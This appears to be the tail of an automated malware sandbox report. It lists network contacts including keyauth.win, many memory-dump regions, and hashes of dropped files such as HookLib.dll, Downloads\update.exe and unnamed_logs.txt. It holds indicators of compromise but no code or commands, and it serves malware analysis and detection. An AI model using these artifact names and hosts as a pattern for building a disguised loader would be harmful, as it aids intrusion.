N/A 127.0.0.1:50423 tcp
N/A 127.0.0.1:50425 tcp
US 172.64.136.33:443 keyauth.win tcp
US 204.79.197.239:443 tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
NL 104.109.143.5:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp

Files

memory/4476-132-0x00007FF686CB0000-0x00007FF687A37000-memory.dmp

memory/4476-133-0x00007FFCE2BF0000-0x00007FFCE2DE5000-memory.dmp

memory/4476-134-0x00007FF686CB0000-0x00007FF687A37000-memory.dmp

memory/4476-135-0x00007FF686CB0000-0x00007FF687A37000-memory.dmp

memory/4476-136-0x00007FF686CB0000-0x00007FF687A37000-memory.dmp

memory/4476-137-0x00007FF686CB0000-0x00007FF687A37000-memory.dmp

memory/4476-139-0x00007FFCA2C70000-0x00007FFCA2C80000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\HookLib.dll

MD5 9c236122ccef6d656ab48148c0aff1db
SHA1 e34489ce487a26a81feb394720e757b5275e6909
SHA256 ad9b423d81d1a1799809039445e6d3051224e49725ba1485a779fbcd56beeefb
SHA512 8ee11b7bf06e9860229005687bcfc20fd0836bb5e0f2796936a0086281a4a21a8b74740456700f2ea1ff3c9fd5d2b5a79c034805101aeb984bafaae72479f97c

memory/4476-140-0x00007FFCA2C70000-0x00007FFCA2C80000-memory.dmp

memory/4476-141-0x00007FF686CB0000-0x00007FF687A37000-memory.dmp

memory/4476-142-0x00007FF686CB0000-0x00007FF687A37000-memory.dmp

memory/4476-143-0x00007FF686CB0000-0x00007FF687A37000-memory.dmp

memory/3408-144-0x0000000000000000-mapping.dmp

memory/3648-145-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\HookLib.dll

MD5 9c236122ccef6d656ab48148c0aff1db
SHA1 e34489ce487a26a81feb394720e757b5275e6909
SHA256 ad9b423d81d1a1799809039445e6d3051224e49725ba1485a779fbcd56beeefb
SHA512 8ee11b7bf06e9860229005687bcfc20fd0836bb5e0f2796936a0086281a4a21a8b74740456700f2ea1ff3c9fd5d2b5a79c034805101aeb984bafaae72479f97c

memory/5000-147-0x0000000000000000-mapping.dmp

memory/5084-148-0x0000000000000000-mapping.dmp

memory/2664-149-0x0000000000000000-mapping.dmp

memory/3192-150-0x0000000000000000-mapping.dmp

memory/2692-151-0x0000000000000000-mapping.dmp

memory/1160-152-0x0000000000000000-mapping.dmp

memory/4304-153-0x0000000000000000-mapping.dmp

memory/2104-154-0x0000000000000000-mapping.dmp

memory/1152-155-0x0000000000000000-mapping.dmp

memory/3124-156-0x0000000000000000-mapping.dmp

memory/4504-157-0x0000000000000000-mapping.dmp

memory/4256-158-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\HookLib.dll

MD5 9c236122ccef6d656ab48148c0aff1db
SHA1 e34489ce487a26a81feb394720e757b5275e6909
SHA256 ad9b423d81d1a1799809039445e6d3051224e49725ba1485a779fbcd56beeefb
SHA512 8ee11b7bf06e9860229005687bcfc20fd0836bb5e0f2796936a0086281a4a21a8b74740456700f2ea1ff3c9fd5d2b5a79c034805101aeb984bafaae72479f97c

memory/2924-160-0x0000000000000000-mapping.dmp

memory/3920-161-0x0000000000000000-mapping.dmp

memory/1556-162-0x0000000000000000-mapping.dmp

memory/1456-163-0x0000000000000000-mapping.dmp

memory/3856-164-0x0000000000000000-mapping.dmp

memory/4272-165-0x0000000000000000-mapping.dmp

memory/2232-166-0x0000000000000000-mapping.dmp

memory/2092-167-0x0000000000000000-mapping.dmp

memory/1984-168-0x0000000000000000-mapping.dmp

memory/3604-169-0x0000000000000000-mapping.dmp

memory/3952-170-0x0000000000000000-mapping.dmp

memory/3960-171-0x0000000000000000-mapping.dmp

memory/4336-172-0x0000000000000000-mapping.dmp

memory/5008-173-0x0000000000000000-mapping.dmp

memory/2600-174-0x0000000000000000-mapping.dmp

memory/1972-175-0x0000000000000000-mapping.dmp

memory/3524-176-0x0000000000000000-mapping.dmp

memory/4484-177-0x0000000000000000-mapping.dmp

memory/4804-178-0x0000000000000000-mapping.dmp

memory/4480-179-0x0000000000000000-mapping.dmp

memory/4964-180-0x0000000000000000-mapping.dmp

memory/4020-181-0x0000000000000000-mapping.dmp

memory/2344-182-0x0000000000000000-mapping.dmp

memory/4808-183-0x0000000000000000-mapping.dmp

memory/1960-184-0x0000000000000000-mapping.dmp

memory/1888-185-0x0000000000000000-mapping.dmp

memory/3284-186-0x0000000000000000-mapping.dmp

memory/3984-187-0x0000000000000000-mapping.dmp

memory/4148-188-0x0000000000000000-mapping.dmp

memory/2168-189-0x0000000000000000-mapping.dmp

memory/4048-190-0x0000000000000000-mapping.dmp

memory/4684-191-0x0000000000000000-mapping.dmp

memory/3012-192-0x0000000000000000-mapping.dmp

memory/3028-193-0x0000000000000000-mapping.dmp

memory/1100-194-0x0000000000000000-mapping.dmp

memory/3148-195-0x0000000000000000-mapping.dmp

memory/3408-196-0x0000000000000000-mapping.dmp

memory/208-197-0x0000000000000000-mapping.dmp

memory/4244-198-0x0000000000000000-mapping.dmp

memory/4600-199-0x0000000000000000-mapping.dmp

memory/4108-200-0x0000000000000000-mapping.dmp

memory/1968-201-0x0000000000000000-mapping.dmp

memory/2312-202-0x0000000000000000-mapping.dmp

memory/2328-203-0x0000000000000000-mapping.dmp

memory/1892-204-0x0000000000000000-mapping.dmp

memory/940-205-0x0000000000000000-mapping.dmp

memory/4320-206-0x0000000000000000-mapping.dmp

memory/2148-207-0x0000000000000000-mapping.dmp

memory/3576-208-0x0000000000000000-mapping.dmp

memory/2404-209-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\HookLib.dll

MD5 9c236122ccef6d656ab48148c0aff1db
SHA1 e34489ce487a26a81feb394720e757b5275e6909
SHA256 ad9b423d81d1a1799809039445e6d3051224e49725ba1485a779fbcd56beeefb
SHA512 8ee11b7bf06e9860229005687bcfc20fd0836bb5e0f2796936a0086281a4a21a8b74740456700f2ea1ff3c9fd5d2b5a79c034805101aeb984bafaae72479f97c

C:\Users\Admin\AppData\Local\Temp\HookLib.dll

MD5 9c236122ccef6d656ab48148c0aff1db
SHA1 e34489ce487a26a81feb394720e757b5275e6909
SHA256 ad9b423d81d1a1799809039445e6d3051224e49725ba1485a779fbcd56beeefb
SHA512 8ee11b7bf06e9860229005687bcfc20fd0836bb5e0f2796936a0086281a4a21a8b74740456700f2ea1ff3c9fd5d2b5a79c034805101aeb984bafaae72479f97c

memory/3956-214-0x00007FFCA2C70000-0x00007FFCA2C80000-memory.dmp

memory/4476-215-0x00007FF686CB0000-0x00007FF687A37000-memory.dmp

memory/4476-217-0x00007FFCE2BF0000-0x00007FFCE2DE5000-memory.dmp

memory/4476-218-0x00007FF686CB0000-0x00007FF687A37000-memory.dmp

memory/4476-219-0x00007FFCE2BF0000-0x00007FFCE2DE5000-memory.dmp

\??\pipe\LOCAL\crashpad_2104_JGOLCTIAJJGBICJP

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\Downloads\update.exe

MD5 27e4dfcae59564bd73bdf7bc2f10e51e
SHA1 48aedbe1072bfc093d814c589e21c8696cf58a85
SHA256 43216e30e4f15418a8a9b037206a81a771944bcc93ca547fc7a52185dd121960
SHA512 24ac1071354637e8de0728cc1edd1927d69a19e10d3858289a063a2df73615b04d9a2214a7d5b8dd13f927cd3968c74101e08b1c9493eb71fddd8fc1a8e02ad9

C:\Users\Admin\Downloads\update.exe

MD5 27e4dfcae59564bd73bdf7bc2f10e51e
SHA1 48aedbe1072bfc093d814c589e21c8696cf58a85
SHA256 43216e30e4f15418a8a9b037206a81a771944bcc93ca547fc7a52185dd121960
SHA512 24ac1071354637e8de0728cc1edd1927d69a19e10d3858289a063a2df73615b04d9a2214a7d5b8dd13f927cd3968c74101e08b1c9493eb71fddd8fc1a8e02ad9

memory/5476-232-0x00007FF67C540000-0x00007FF67D310000-memory.dmp

memory/5476-233-0x00007FF67C540000-0x00007FF67D310000-memory.dmp

memory/5476-234-0x00007FF67C540000-0x00007FF67D310000-memory.dmp

memory/5476-235-0x00007FFCE2BF0000-0x00007FFCE2DE5000-memory.dmp

memory/5476-236-0x00007FF67C540000-0x00007FF67D310000-memory.dmp

memory/5476-237-0x00007FF67C540000-0x00007FF67D310000-memory.dmp

memory/5476-239-0x00007FFCA2C70000-0x00007FFCA2C80000-memory.dmp

memory/5476-240-0x00007FFCA2C70000-0x00007FFCA2C80000-memory.dmp

C:\Users\Admin\Downloads\HookLib.dll

MD5 98f49c27634711f0af5e9535b13179f5
SHA1 4267af836b75278f22724a6864525efd60597781
SHA256 9afef3e87b1ab5973d002444f9c76edc2b4cee1e3441eaec539673c412b7fe16
SHA512 409fce493aa7bbe6bcc8d7e972fbe3e0da13fda86c6e14bdaf1c3b0e43ee0ab6c4c1ccd4efcb213681e3f54bd7658569647e08451aa5bd1daaba7f692ba427ad

memory/5476-243-0x00007FF67C540000-0x00007FF67D310000-memory.dmp

memory/5476-244-0x00007FF67C540000-0x00007FF67D310000-memory.dmp

memory/5476-245-0x00007FF67C540000-0x00007FF67D310000-memory.dmp

C:\Users\Admin\Downloads\HookLib.dll

MD5 98f49c27634711f0af5e9535b13179f5
SHA1 4267af836b75278f22724a6864525efd60597781
SHA256 9afef3e87b1ab5973d002444f9c76edc2b4cee1e3441eaec539673c412b7fe16
SHA512 409fce493aa7bbe6bcc8d7e972fbe3e0da13fda86c6e14bdaf1c3b0e43ee0ab6c4c1ccd4efcb213681e3f54bd7658569647e08451aa5bd1daaba7f692ba427ad

C:\Users\Admin\Downloads\HookLib.dll

MD5 98f49c27634711f0af5e9535b13179f5
SHA1 4267af836b75278f22724a6864525efd60597781
SHA256 9afef3e87b1ab5973d002444f9c76edc2b4cee1e3441eaec539673c412b7fe16
SHA512 409fce493aa7bbe6bcc8d7e972fbe3e0da13fda86c6e14bdaf1c3b0e43ee0ab6c4c1ccd4efcb213681e3f54bd7658569647e08451aa5bd1daaba7f692ba427ad

C:\Users\Admin\Downloads\HookLib.dll

MD5 98f49c27634711f0af5e9535b13179f5
SHA1 4267af836b75278f22724a6864525efd60597781
SHA256 9afef3e87b1ab5973d002444f9c76edc2b4cee1e3441eaec539673c412b7fe16
SHA512 409fce493aa7bbe6bcc8d7e972fbe3e0da13fda86c6e14bdaf1c3b0e43ee0ab6c4c1ccd4efcb213681e3f54bd7658569647e08451aa5bd1daaba7f692ba427ad

C:\Users\Admin\Downloads\HookLib.dll

MD5 98f49c27634711f0af5e9535b13179f5
SHA1 4267af836b75278f22724a6864525efd60597781
SHA256 9afef3e87b1ab5973d002444f9c76edc2b4cee1e3441eaec539673c412b7fe16
SHA512 409fce493aa7bbe6bcc8d7e972fbe3e0da13fda86c6e14bdaf1c3b0e43ee0ab6c4c1ccd4efcb213681e3f54bd7658569647e08451aa5bd1daaba7f692ba427ad

C:\Users\Admin\Downloads\HookLib.dll

MD5 98f49c27634711f0af5e9535b13179f5
SHA1 4267af836b75278f22724a6864525efd60597781
SHA256 9afef3e87b1ab5973d002444f9c76edc2b4cee1e3441eaec539673c412b7fe16
SHA512 409fce493aa7bbe6bcc8d7e972fbe3e0da13fda86c6e14bdaf1c3b0e43ee0ab6c4c1ccd4efcb213681e3f54bd7658569647e08451aa5bd1daaba7f692ba427ad

memory/5476-253-0x00007FF67C540000-0x00007FF67D310000-memory.dmp

memory/5476-254-0x00007FFCE2BF0000-0x00007FFCE2DE5000-memory.dmp

memory/5476-255-0x00007FFCA2C70000-0x00007FFCA2C80000-memory.dmp

memory/5476-256-0x00007FFCE2BF0000-0x00007FFCE2DE5000-memory.dmp

memory/5476-258-0x00007FF67C540000-0x00007FF67D310000-memory.dmp

C:\Users\Admin\Downloads\unnamed_logs.txt

MD5 05c4899eba745278b926db74dc76aa61
SHA1 cb9259fcaefad8ab82513ba37fb270e99f7f4c4b
SHA256 cc9e82a234856466b859ba9a8d2c59835ecb5bbb2aca740b74fea8a9778855f2
SHA512 c01c2687e48142de6bcbacf209c8804099679cc71ac19bd1d15c7ce0977f5438126658a6e9fa6143c36986bc7ea28dd91698a26f07b5d144bff8e337ed7a9cfe